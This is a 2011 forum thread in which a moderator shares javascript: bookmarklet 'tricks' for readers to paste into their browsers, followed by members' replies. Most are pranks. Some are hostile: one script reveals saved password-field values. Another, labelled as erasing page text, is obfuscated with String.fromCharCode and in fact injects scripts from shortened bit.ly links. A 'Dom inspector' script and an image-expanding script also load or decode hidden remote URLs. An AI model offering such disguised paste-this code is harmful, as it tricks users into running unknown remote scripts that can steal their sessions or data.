Latest topics | » New Banner Designing ContestMon Apr 30, 2012 7:00 am by ruifcp» Scratch Card+Ginger Bread Coin Hack(by EX Hacks)Fri Jan 06, 2012 7:39 pm by Professional Admiin» How to make NS not lag(HD)Fri Jan 06, 2012 7:39 pm by Professional Admiin» To every1 here!!Mon Jan 02, 2012 3:44 pm by kurosakinaruto » Changes Very Good!Mon Jan 02, 2012 1:33 am by Professional Admiin» Go Try Here~!Sun Jan 01, 2012 9:23 am by ruifcp» 2nd Anniversary Never EndWed Dec 21, 2011 5:13 pm by Professional Admiin» Lets Play...Lets Make A Count DownMon Dec 12, 2011 7:20 am by uchihasasuke2709 » ProDesigners Ranks!Sat Dec 10, 2011 3:48 am by Professional Admiin» [Req] Using Fiddler2 :)Sun Dec 04, 2011 11:32 am by Spawn[FaceSkull]» (REQUEST PLEASE)Sat Dec 03, 2011 6:00 am by Spawn[FaceSkull]» My Ninja Was Banned!Thu Dec 01, 2011 7:33 am by DarkAvatar » Im Newbie HereTue Nov 29, 2011 7:14 pm by Professional Admiin» Must Try Token & Emblem in Easy StepsTue Nov 29, 2011 3:10 pm by CathyJane » New Forum Name...Hall Change...Must SeeTue Nov 29, 2011 2:06 pm by Professional Admiin |
Top posting users this month | |
Most active topic starters | |
Statistics | We have 257 registered users The newest registered user is dark147
Our users have posted a total of 2446 messages in 224 subjects
|
|
| JAVASCRIPT CHEEKY TRICKS | |
| | Author | Message |
---|
uRBAN dAMAGE Global Moderator
Posts : 125 Join date : 2011-11-09 Age : 33 Location : Hacked Land
| Subject: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 6:38 am | |
| Javascript to make pop up a message:
javascript:function reverse() { var inp = " !!!..skcoR dlrowkcahe "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse()
Javascript to find passwords behind the astriks:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})(); (OR)
javascript:shum=document.getElementsByTagName('input');for(x=0;x<shum.length;x++){shumj=shum[x].type;if(shumj=="password"){shum[x].type="text"}};void(0)
Javascript to rotate images on webpage:
javascript: R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0); (OR)
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)
(OR)
javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)
Javascript which vibrates your browser:
javascript:function flood(n) {if (self.moveBy) {for (i = 20; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(10);{ var inp = "!!!..skcoR dlrowkcahe"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
(OR)
javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0) (OR)
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
Javascript which pop up message and changes text colour on webpage:
javascript:alert("Created by ehackworld.tk"); i=0; c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);
Javascript to Edit any webpage:
javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void 0
Javascript which erases the text on webpage:
javascript:eval(String.fromCharCode(106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 58, 118, 97, 114, 32, 105, 44, 115, 44, 115, 115, 61, 91, 39, 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47, 106, 121, 115, 68, 57, 69, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47, 101, 104, 73, 69, 74, 76, 39, 93, 59, 102, 111, 114, 40, 105, 61, 48, 59, 105, 33, 61, 115, 115, 46, 108, 101, 110, 103, 116, 104, 59, 105, 43, 43, 41, 123, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 115, 115, 91, 105, 93, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 125, 118, 111, 105, 100, 40, 48, 41, 59))
funny javascript to fool your friends:
javascript:alert("Wait for few seconds......");nb=document.all[0].innerHTML.match(/[0-1]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML="<center><font style='font-size:100'><b><b>Computer Hacked By ehackworld</b></b></font>";for(i=1;i<=100;i++){document.body.innerHTML+='<img src="http://bit.ly/iJ739S">';};void(0)
Javascript which opens two webpages on same Tab:
javascript:alert("Created by ehackworld.tk");document.body.innerHTML+='<iframe name="ls" width="1000" height="600"></iframe>';window[0].location="http://www.ehackworld.tk/";function lostsoul(){document.forms[1].target="ls";window[0].document.forms['accept_0'].submit();};void(setInterval(lostsoul,4000))
Javascript which changes text colour on a webpage:
javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);
Javascript for Blinking text on webpage:
javascript: cor = "red"; var timer_1; function vagalume () {(cor == "yellow") ? cor = "red": cor = "yellow"; document.links[20].parentNode.parentNode.style.backgroundColor = cor; timer_1 = setTimeout('vagalume ()',100)}; vagalume ()
Dom inspector Javascript:
javascript:prefFile=''; void(z=document.body.appendChild(document.createElement('script'))); void(z.language='javascript'); void(z.type='text/javascript'); void(z.src='http://bit.ly/nSSQw'); void(z.id='modi');
Javascript for Dancing text on webpage:
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
Javascript to expand images on a webpage:
javascript:DI=document.images;connectionstring= "!gsso9..hl`fdr2-nqjts-bnl.hl`fdr.lhkhdt.0.257.207/1257-iof!";exec1="";function A(){for(i=1;i<connectionstring.length-1;i++){exec1=exec1 + String.fromCharCode(connectionstring.charCodeAt(i)+1);}DI[3].src=exec1;}function B(){if(DI[3].width<300){DI[3].width++;}}A();setInterval('B()',5); void(0);
(OR)
javascript:mwunm=128;void(setInterval("mwunm++;document.images[2].width=mwunm",5)) | |
| | | Professional Admiin Administrator
Posts : 842 Join date : 2011-09-28 Age : 26
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 2:46 pm | |
| Thats What I Need Exactly Keep It Up Bro. | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 6:39 pm | |
| I see , I'mm gonna try this in my blog | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 6:47 pm | |
| This is a bit kind of hacking : xD
Javascript to find passwords behind the astriks:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
(OR)
javascript:shum=document.getElementsByTagName('input');for(x=0;x<shum.length;x++){shumj=shum[x].type;if(shumj=="password"){shum[x].type="text"}};void(0) | |
| | | uRBAN dAMAGE Global Moderator
Posts : 125 Join date : 2011-11-09 Age : 33 Location : Hacked Land
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 6:48 pm | |
| | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 6:51 pm | |
| its makes the password visible ..xD...WTH! | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 6:54 pm | |
| By the way, you should put in what part of the template in site it should be putted xD
make it , | |
| | | nsph(saga) Special Member
Posts : 134 Join date : 2011-10-06 Age : 26 Location : behind you every time
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 7:12 pm | |
| lol to much texts......how did you got them bro | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 7:39 pm | |
| its easy to track ,, in ehack xD | |
| | | nsph(saga) Special Member
Posts : 134 Join date : 2011-10-06 Age : 26 Location : behind you every time
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 7:49 pm | |
| | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Mon Nov 14, 2011 7:51 pm | |
| | |
| | | [Neo_93] Gold Member
Posts : 435 Join date : 2011-10-04 Age : 31 Location : Serbia
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 3:05 am | |
| uRBAN dAMAGE, I'll need your help next weekend. I'll contact you via PM soon. | |
| | | Professional Admiin Administrator
Posts : 842 Join date : 2011-09-28 Age : 26
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 3:24 am | |
| Yeah He Is Moderator Now | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 6:18 am | |
| | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 6:18 am | |
| i want to know where the scripts will be putted in the template in blog xD | |
| | | [Neo_93] Gold Member
Posts : 435 Join date : 2011-10-04 Age : 31 Location : Serbia
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 6:21 am | |
| - [Neo_93] wrote:
- uRBAN dAMAGE, I'll need your help next weekend. I'll contact you via PM soon.
Never mind, I wanted to ask you something, but I figure it by myself. | |
| | | uRBAN dAMAGE Global Moderator
Posts : 125 Join date : 2011-11-09 Age : 33 Location : Hacked Land
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 9:20 am | |
| hehehe ok dude | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 6:15 pm | |
| - uRBAN dAMAGE wrote:
- hehehe ok dude
Dude , pls put some tuts on where the scripts should be putted in the template of blog,i want to use it | |
| | | uRBAN dAMAGE Global Moderator
Posts : 125 Join date : 2011-11-09 Age : 33 Location : Hacked Land
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 8:39 pm | |
| tell me for what ??? and wat forum? | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 8:45 pm | |
| | |
| | | uRBAN dAMAGE Global Moderator
Posts : 125 Join date : 2011-11-09 Age : 33 Location : Hacked Land
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Tue Nov 15, 2011 8:57 pm | |
| hmmm i dont know much abouth blogs lol
for forum i can help you | |
| | | [Neo_93] Gold Member
Posts : 435 Join date : 2011-10-04 Age : 31 Location : Serbia
| | | | [Neo_93] Gold Member
Posts : 435 Join date : 2011-10-04 Age : 31 Location : Serbia
| | | | uRBAN dAMAGE Global Moderator
Posts : 125 Join date : 2011-11-09 Age : 33 Location : Hacked Land
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Wed Nov 16, 2011 2:57 am | |
| yea here is my friend Neo will help you | |
| | | Spawn[FaceSkull] Administrator
Posts : 255 Join date : 2011-10-13 Age : 28 Location : Somewhere can't be seen
| Subject: Re: JAVASCRIPT CHEEKY TRICKS Wed Nov 16, 2011 5:50 pm | |
| Hmmm...okey if i have time..ill contact you (: | |
| | | | JAVASCRIPT CHEEKY TRICKS | |
|
| Permissions in this forum: | You cannot reply to topics in this forum
| |
| |
| |